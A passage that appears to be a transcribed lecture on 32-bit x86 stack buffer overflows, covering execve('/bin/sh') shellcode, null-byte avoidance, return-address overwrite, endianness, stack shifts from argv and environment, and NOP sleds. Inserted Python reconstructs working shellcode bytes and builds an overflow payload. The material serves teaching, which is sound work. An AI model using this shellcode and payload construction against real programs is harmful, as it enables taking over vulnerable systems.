going to do //bi and n/sh. So now on the stack we know there are the bytes //bin/sh and then zero, which is a null-terminated string, which is exactly what we want. Then we're going to move the stack pointer into ebx. Then we're going to push eax on the stack. Why are we pushing eax on the stack? Yeah, we're taking advantage of the fact that we know eax is zero. We used to have a push of zero onto the stack to get that null value into our argv array on the stack. So we push eax, we then push ebx, which is the pointer to the string //bin/sh, then we move the stack pointer into ecx, and then we move eax into edx. So what is this doing? It zeroes edx, because eax is zero, we know that for a fact. You could also do XOR edx, edx. It's a fun game, actually; people spend a lot of time trying to rewrite shellcode to make it smaller and better and cooler. And then we need to move hex 0xb into al, the lower 8 bits of eax, and then we call int 0x80, because we've set everything up correctly. And then we have our exit just for good fun.

So we can compile this, run it, and it will work, it will give us a shell locally. We can test this shellcode and it will work and give us a shell. Oh, and this one's broken, so don't copy it, do it yourself. Good that I put that there.

So now that we've written this shellcode, these are essentially some magic bytes. We can throw them into any process, and as long as these bytes are inside executable memory and we can control the instruction pointer to start executing at the very first byte here, this will give us a shell.

The other fair warning I'm going to give you now, so keep it in mind when you're doing these binary challenges: you have to think about what you are doing. By pushing things on the stack you are changing the stack, correct? You're pushing the string /bin/sh onto the stack. Where's your shellcode living?
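The null-byte checklist above can be automated. The sketch below is a reconstruction, in Python, of the execve portion of the steps just described, using standard 32-bit x86 encodings; it is not the bytes from the lecture slide (which the lecturer says is broken on purpose), and the exit tail is left out. The helper names bad_bytes and stack_string are made up for this example.

```python
# Each entry: (hex encoding, AT&T mnemonic). Assumed reconstruction, not the slide.
INSTRUCTIONS = [
    ("31c0",       "xor  %eax,%eax"),
    ("50",         "push %eax"),
    ("686e2f7368", "push $0x68732f6e   # bytes 'n/sh'"),
    ("682f2f6269", "push $0x69622f2f   # bytes '//bi'"),
    ("89e3",       "mov  %esp,%ebx"),
    ("50",         "push %eax"),
    ("53",         "push %ebx"),
    ("89e1",       "mov  %esp,%ecx"),
    ("89c2",       "mov  %eax,%edx"),
    ("b00b",       "mov  $0xb,%al"),
    ("cd80",       "int  $0x80"),
]

SHELLCODE = b"".join(bytes.fromhex(h) for h, _ in INSTRUCTIONS)


def bad_bytes(code, forbidden=b"\x00\x0a"):
    """Return (offset, value) for every byte that strcpy or gets would choke on."""
    return [(i, b) for i, b in enumerate(code) if b in forbidden]


def stack_string(instructions):
    """Bytes left in memory by the push-immediate (opcode 68) instructions.

    The stack grows downward, so the last push sits at the lowest address
    and is read first.
    """
    pushed = [bytes.fromhex(h)[1:] for h, _ in instructions if h.startswith("68")]
    return b"".join(reversed(pushed))


print(len(SHELLCODE), "bytes, bad bytes:", bad_bytes(SHELLCODE))
print("string on stack:", stack_string(INSTRUCTIONS))
print("original mov:", bad_bytes(bytes.fromhex("b80b000000")))
```

Running the same check on the five-byte mov of 0xb into eax shows the three zero bytes that motivated the rewrite.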
Because we copied it onto the stack, it's on the stack. So keep that in mind, because a while back I spent a long time debugging code because of that. So now it's on you, now you know why, and I'll be like, I told you in class. You'll be upset until you figure it out.

All right, so this shellcode is not that long. Can anybody count really quick? Was it 8 times 4, like 33 bytes, which is pretty short. So as long as we can copy 33 bytes onto the stack and then overwrite the saved instruction pointer to be the address of the very first instruction, we can completely take over a program and, as they say, pop a shell. So we need the shellcode, then random junk up to the saved eip, and then the address of the shellcode.

I want to make sure I cover this, so I'll let you go through the details at your leisure. You can see at the bottom here this huge gcc command, which has all of these options, -fno-omit-frame-pointer and so on. All of these deal with security protections, and I've been adding to them over the years; we'll be disabling the protections, as we've learned about in class. But this is something that, you know, just exists.

So this is an example of a main program that has a character buffer foo of 50, that does a string copy from argv[1] onto foo, and then returns 10. So the idea is, looking at this code, we can see that the argument to string copy, the destination buffer, is at ebp minus 0x32. So how many bytes from the start of the buffer to the saved base pointer on the stack? No, not 50, or maybe, I don't know, actually: is it 0x32, is that 50?
Okay, I was hoping that's not the same. All right, so I think that's actually the preferred stack boundary of 2 that is making it be the same. So we have 0x32, but the important thing is that this 0x32 is in the assembly; that's why I look at the assembly and not the C code. So we know from our buffer we can copy 0x32 bytes onto the stack, 32 hex, which is 50. So that can include our shellcode: we can include our 33 bytes of shellcode, the rest of the bytes are garbage, whatever we want, and then we have 4 bytes of saved base pointer, and then we need the 4 bytes of the address of the start of our shellcode.

And so we can set a breakpoint there and run this. I usually use Python to pass in these kinds of things. I also highly recommend you look at pwntools; it's very nice for interacting with a program and passing these kinds of arbitrary inputs to a program. And I'm going to briefly walk through it. So we are going to get to our string copy. We pass the input in our argv vector, so our argv vector is up here, bfff734, that's argv, and then this address, bfff87b, which is the string, so that's going to be the input that we passed in. So we basically passed our shellcode, and we didn't actually overflow anything here. So here we do the string copy, and we have then copied our 33 bytes of shellcode plus a null byte onto the stack. We actually don't overflow anything and everything went correctly; we didn't touch the saved instruction pointer.

This is another important thing that I've seen students struggle with: just injecting shellcode onto the stack doesn't magically make anything happen, because the CPU doesn't care about what you put into memory. What it cares about is what's in the eip register, and that's where it goes and executes. So we need 33 bytes of shellcode, 17 random bytes, we'll use A's, 4 bytes of saved base pointer, and then 4 bytes of the address of our shellcode. So we can do this same thing: our shellcode, 17 A's... why did I do
this backwards? That's super weird. And then BCDE, which is the saved base pointer. I like to put in a value there so I can actually see it on the stack when I'm debugging, and I know it's different than my A's of junk. And then bfff666. So why did I use that one? Because when we go back, we know our buffer is at bfff666; it's a super auspicious number. So we do this, we do the string copy, we copy the shellcode, 17 A's, our base pointer, and then bfff666.

What's the problem here in this diagram? Is this going to work when we return? Let's step. Where are we going to start executing when the ret executes? If we go back, you can see I put the address in as bfff666, and if I look here at what gets copied, the endianness is the problem. The input is copied byte by byte, so the address ends up with its bytes in the wrong order in memory. Okay, that's not going to work, it's going to seg fault. So we need to swap the bytes around, and then that will work.

But there's another problem here, which I need to point out before you start doing this. Even if I did this correctly with bfff666, if I start executing from there, is that where the start of my shellcode is? I know, right at this call to string copy, that the argument on the stack is the address of my buffer. So here's the thing: why is the address of my buffer here bfff646, when in the previous run it was bfff666? It's a difference of 0x20 bytes. What happened?
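The payload layout and the byte-order fix just described can be sketched in Python with struct. Assumptions are marked in the comments: the 33 bytes are a placeholder rather than real shellcode, the address 0xbffff646 is a hypothetical stand-in (the transcript's address is not fully legible), and build_payload is a name made up for this example.

```python
import struct

BUFFER_TO_SAVED_EBP = 0x32  # from the disassembly: buffer sits at ebp - 0x32


def build_payload(shellcode, buffer_addr, saved_ebp=b"BCDE"):
    """shellcode + filler up to saved ebp + 4-byte saved ebp + return address."""
    filler = b"A" * (BUFFER_TO_SAVED_EBP - len(shellcode))
    # "<I" packs a 32-bit value little-endian, the order x86 expects in memory.
    return_address = struct.pack("<I", buffer_addr)
    return shellcode + filler + saved_ebp + return_address


placeholder_shellcode = b"\xcc" * 33  # placeholder: 33 bytes, not real shellcode
hypothetical_buffer = 0xBFFFF646      # hypothetical address for illustration

payload = build_payload(placeholder_shellcode, hypothetical_buffer)
print(len(payload))                                     # 33 + 17 + 4 + 4
print(payload[-4:].hex())                               # little-endian: works
print(struct.pack(">I", hypothetical_buffer).hex())     # big-endian: the mistake
```

Typing the address in reading order corresponds to the big-endian line; the little-endian line is what actually has to land over the saved eip.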
I'm saving you hours of heartache, by the way. Think about how the process's memory is laid out. What's at the very top of the process's memory? Not the kernel, not the data section. All right, somebody remember this: slide 219, the process structure slide. At the very, very top of memory are the environment, the actual values, and the argv values. The difference between those two invocations is that I'm passing more data in argv, which means that the entire stack shifts down. And the environment includes the present working directory, the home directory, all kinds of stuff, which makes this a pain. So figuring out where that address is can be very difficult, because it shifts depending on your input. I've spent many a time debugging an exploit in GDB only to have it fail when actually running it, because the stack changed. So keep that in mind. Okay, good, now we do it correctly and then we get a shell.

And this goes to this point: the key problem is you need to get that address right, 100% exactly, because you need to start executing at the very first byte of your shellcode, given the same environment. This is why using something like pwntools, or something that's always going to execute a process with exactly the same memory layout, is really handy.

But a better trick is to use what's known as a NOP sled. The idea is, well, if you have to guess the very first instruction of your shellcode, why not make your shellcode longer, and at the beginning put in NOPs; in x86, 0x90 is a no-op. So just put in as many no-ops as you can: rather than those 17 A's, put 17 no-ops, and that way you only have to land anywhere in those to get it. Depending on the size of your buffer, I mean, you can make your NOP sled as big as you want, so it's actually really easy, you're highly likely to land in there. So I wanted to talk about that because that's super important. I think I'm going
to leave it there. Yeah, you can. Okay, awesome. So yeah, if your buffer is really small, you can try putting shellcode into something else. I think that's all you need for now. You're already all capable of doing the first five levels for sure, and this will get you a lot of the way; they are different concepts. So pwntools, you can use it in your Python script to pass the input... let's talk after class.
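A minimal Python sketch of the NOP sled idea follows. It uses a 33-byte placeholder instead of real shellcode and a toy model of execution that only knows how to step over 0x90 bytes; with_nop_sled and landing_offset are names invented for this example.

```python
NOP = 0x90  # x86 single-byte no-op


def with_nop_sled(shellcode, sled_len):
    """Put sled_len NOP bytes in front of the shellcode."""
    return bytes([NOP]) * sled_len + shellcode


def landing_offset(buffer, start):
    """Toy model: step over NOPs from `start`, return where real code begins."""
    offset = start
    while offset < len(buffer) and buffer[offset] == NOP:
        offset += 1
    return offset


placeholder_shellcode = b"\xcc" * 33  # placeholder bytes, not real shellcode
buffer = with_nop_sled(placeholder_shellcode, 17)

# Any guessed start inside the sled slides to the first shellcode byte.
for guess in (0, 5, 16, 17):
    print(guess, "->", landing_offset(buffer, guess))
```

With a 17-byte sled there are 18 acceptable return addresses instead of one, which is the slack that absorbs the stack shifting when argv or the environment changes size.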